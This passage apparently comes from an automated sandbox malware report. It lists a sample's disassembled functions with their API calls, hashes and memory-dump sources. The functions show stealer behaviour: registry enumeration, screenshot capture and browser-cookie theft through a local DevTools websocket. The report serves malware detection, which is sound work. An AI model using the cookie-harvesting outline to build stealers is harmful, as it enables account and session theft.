                                                                                                                                                                                                                                                  • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                                                  Function 004012DC Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                  • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                                                                                                  Function 009B1543 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                  • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                                                                                                  Function 004010B0 Relevance: 27.1, APIs: 18, Instructions: 125stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004010CB
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004010D8
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315C9), ref: 004010FF
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315CC), ref: 00401124
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315CF), ref: 00401149
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315D2), ref: 0040116E
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315D5), ref: 00401199
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315C9), ref: 004011A1
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315D8), ref: 004011C2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315DB,?,004315D8), ref: 004011E7
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315DE,?,004315DB,?,004315D8), ref: 0040120C
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 00401231
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 00401256
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 0040125E
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 0040127F
                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040128C
                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040129F
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004012B8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$memsetstrcmp$ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3817037828-0
                                                                                                                                                                                                                                                  • Opcode ID: 728af6f4b6e436d0f42b955efdaf7f2f13925295410a051c2a29943bed5eb9b8
                                                                                                                                                                                                                                                  • Instruction ID: 6a77ad9a97fae506735b514474991cfdc0921c47067fbaefa5242544d6cd76bf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 728af6f4b6e436d0f42b955efdaf7f2f13925295410a051c2a29943bed5eb9b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0341E420A442807AD7219B61FD8CB9A3EA95F96318F44307EF442251F2CBFD0588C36E
                                                                                                                                                                                                                                                  Function 009C0E3E Relevance: 24.5, APIs: 16, Instructions: 480registryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C0E5A
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C0E73
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C0E84
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C0E95
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00643CD2,00000000,00000001,?), ref: 009C0EFE
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,00643D28,00643D10,00000010,00000000,?,00000004), ref: 009C0F7B
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009C0F98
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009C0FCC
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00643D32,00000000,00000009,?), ref: 009C1033
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 009C106B
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrlen.KERNEL32(?,?,?,?,?,009B1847,?,0042EEFC), ref: 009C3AE0
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B09
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrcat.KERNEL32(00000000,?), ref: 009C3B11
                                                                                                                                                                                                                                                    • Part of subcall function 009C3A27: lstrcpy.KERNEL32(00000000), ref: 009C3A5F
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,00643D88,0000FFFF,00000000,?,00000004,?,?,?), ref: 009C11E3
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,00643DB0,00000002,00000000,?,?,?,?,00643DA0,?,?,?,?,?), ref: 009C12DA
                                                                                                                                                                                                                                                    • Part of subcall function 009C3A6D: lstrcpy.KERNEL32(00000000,00000000), ref: 009C3AAD
                                                                                                                                                                                                                                                    • Part of subcall function 009C3A6D: lstrcat.KERNEL32(00000000,0042EEFC), ref: 009C3AB7
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,00643DC0,00000002,00000000,?,?,?,?,00643BBD,?,?,?), ref: 009C1375
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC,?,?,00643DD0), ref: 009C13D2
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 009C1490
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00643BC0), ref: 009C151C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Valuememset$Closelstrcpy$EnumOpenlstrcat$lstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 327098194-0
                                                                                                                                                                                                                                                  • Opcode ID: cdfd7f7ffb602feaeb5d0b1cb599e72a99351b3c00e1df40b6be7f6cd5ac3a16
                                                                                                                                                                                                                                                  • Instruction ID: ab31ac77a4676c900dcbe6b138c5927324285535900d7d860fce1524883c3a2b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cdfd7f7ffb602feaeb5d0b1cb599e72a99351b3c00e1df40b6be7f6cd5ac3a16
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C12F634E043A49ADB20EF70DC55FAE7BBAAF86304F00941DE44567392CBB55A89CB52
                                                                                                                                                                                                                                                  Function 0040A7C1 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 238stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetReadFile.WININET(00000000,?,00001000), ref: 0040970E
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetReadFile.WININET(00000000,?,00001000), ref: 00409734
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetCloseHandle.WININET(00000000), ref: 00409746
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetCloseHandle.WININET(19d), ref: 00409750
                                                                                                                                                                                                                                                    • Part of subcall function 0041278E: strlen.MSVCRT ref: 0041279E
                                                                                                                                                                                                                                                    • Part of subcall function 0041278E: memcmp.MSVCRT(?,?,00000000), ref: 004127C5
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040A895
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,ws://localhost:9223,00000000,localhost,0042EEFC), ref: 0040A8FA
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040A90A
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,0042EEFC,00000000), ref: 0040A954
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,0042EEFC,00000000), ref: 0040A96B
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,?,?,?,?,0042EEFC,00000000), ref: 0040A9D8
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,?,?,?,?,0042EEFC,00000000), ref: 0040AA08
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internetlstrcat$CloseFileHandleRead$memcmpmemcpymemsetstrlen
                                                                                                                                                                                                                                                  • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                  • API String ID: 1951979638-4155744131
                                                                                                                                                                                                                                                  • Opcode ID: 5d9a63772d8fc80b55ca352ee1af688ab2a6bdb05e2b97055c5b68e1efb0ed4b
                                                                                                                                                                                                                                                  • Instruction ID: cb497cd3caf05907a7207c2bc0cb865dc1d22c80e8fc0a0c68342ace2b668139
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d9a63772d8fc80b55ca352ee1af688ab2a6bdb05e2b97055c5b68e1efb0ed4b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2A135B49003549BDB01EF34DC81BAA77B9BF42308F00542DE491677D2DBB8AAC6CB95
                                                                                                                                                                                                                                                  Function 009B130C Relevance: 21.1, APIs: 14, Instructions: 129stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$memsetstrcmp$ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3817037828-0
                                                                                                                                                                                                                                                  • Opcode ID: abc8560da33bf2fb35fd7676998d50ed9d1deec662aada542982aacc3b18bb14
                                                                                                                                                                                                                                                  • Instruction ID: a98ff79f154a8826de77fdd5a30b5a8c32a8b8d149e5be3ae89e99ec89d37e9a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abc8560da33bf2fb35fd7676998d50ed9d1deec662aada542982aacc3b18bb14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3541F520A442847AE722D721EE8DBD93EEA9FD6318F80303AF042511F1DBAD0548C32E
                                                                                                                                                                                                                                                  Function 009C44EE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 169registrystringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,00000000,00020019,0042EEFC), ref: 009C4532
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 009C4573
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019), ref: 009C45DB
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,?,?), ref: 009C4608
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009C461F
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,0064403B), ref: 009C46B6
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00644040), ref: 009C472D
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 009C4759
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 009C476D
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 009C4777
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Close$EnumOpenQueryValue$lstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                                  • API String ID: 2954784806-1684325040
                                                                                                                                                                                                                                                  • Opcode ID: af859ca9dc6edd80a9ec9f16aa9c02abffaa3d524dfc5d6bcc5b65d79d611d53
                                                                                                                                                                                                                                                  • Instruction ID: 116c8534acc1b78089cd4ef4d5e5b6cc07c4bcb23fc2217778ddf74460eeacc4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af859ca9dc6edd80a9ec9f16aa9c02abffaa3d524dfc5d6bcc5b65d79d611d53
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3661CC31608344AFE321AF60DD96F6ABBE9BFC6708F00980DF68483151DB759A58CB53
                                                                                                                                                                                                                                                  Function 009C4EFD Relevance: 18.2, APIs: 12, Instructions: 159COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009C4F36
                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 009C4F40
                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 009C4F4D
                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009C4F7D
                                                                                                                                                                                                                                                  • GetHGlobalFromStream.COMBASE(?,?), ref: 009C5019
                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(?), ref: 009C5021
                                                                                                                                                                                                                                                  • GlobalSize.KERNEL32(?), ref: 009C5037
                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 009C509D
                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 009C50B8
                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 009C50BF
                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 009C50CC
                                                                                                                                                                                                                                                  • CloseWindow.USER32(?), ref: 009C50D3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: GlobalObject$Window$DeleteSelectStream$CloseCreateDesktopFromLockRectReleaseSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3547074919-0
                                                                                                                                                                                                                                                  • Opcode ID: 786feabe4aac4ce43d01109e92d56cb5fec2791526f4185d5024407780f808c1
                                                                                                                                                                                                                                                  • Instruction ID: c4676fe286882739ca0b391261ab3372e4b9c813438ee8f75903237fd6f30404
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 786feabe4aac4ce43d01109e92d56cb5fec2791526f4185d5024407780f808c1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC511975900219EFDF11DFA0DC4AFEEBBB9FF49350B009119F901A2160EB70AA55CBA1
                                                                                                                                                                                                                                                  Function 009C1539 Relevance: 17.0, APIs: 11, Instructions: 496stringmemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 009C165B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,00000028,0042EEFC), ref: 009C1694
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 009C16EE
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 009C174F
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 009C17B1
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 009C1843
                                                                                                                                                                                                                                                    • Part of subcall function 009C53D7: malloc.MSVCRT ref: 009C53E8
                                                                                                                                                                                                                                                    • Part of subcall function 009C3A27: lstrcpy.KERNEL32(00000000), ref: 009C3A5F
                                                                                                                                                                                                                                                    • Part of subcall function 009BB19F: lstrlen.KERNEL32(?,00000000,?,00000000,?,?,009B882B,00000000,?,?,?,?,?,?,?), ref: 009BB1AD
                                                                                                                                                                                                                                                    • Part of subcall function 009BB19F: LocalAlloc.KERNEL32(00000040,00000000,?,009B882B,00000000,?,?,?,?,?,?,?), ref: 009BB1D8
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00643BBD), ref: 009C1A34
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00643BBD), ref: 009C1A92
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00643BBD), ref: 009C1A9A
                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 009C1AD4
                                                                                                                                                                                                                                                    • Part of subcall function 009C39DF: lstrlen.KERNEL32(00000000,?,?,009B883E,0042EEFC,00000000,?,?,?,?,?,?,?), ref: 009C39E8
                                                                                                                                                                                                                                                    • Part of subcall function 009C39DF: lstrcpy.KERNEL32(00000000,00000000), ref: 009C3A19
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrlen.KERNEL32(?,?,?,?,?,009B1847,?,0042EEFC), ref: 009C3AE0
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B09
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrcat.KERNEL32(00000000,?), ref: 009C3B11
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009C1AF2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen$lstrcatlstrcpy$strtok_s$AllocHeapLocalProcessmalloc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2997608458-0
                                                                                                                                                                                                                                                  • Opcode ID: a68134cb651d9ddd32a15a0d10eae0307fd36d674900b40827a4ca3a86a29651
                                                                                                                                                                                                                                                  • Instruction ID: 4c33523a4f1e17428f0b21ece02aaccf23b6921be4c102c0a5ee20b88bdffada
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a68134cb651d9ddd32a15a0d10eae0307fd36d674900b40827a4ca3a86a29651
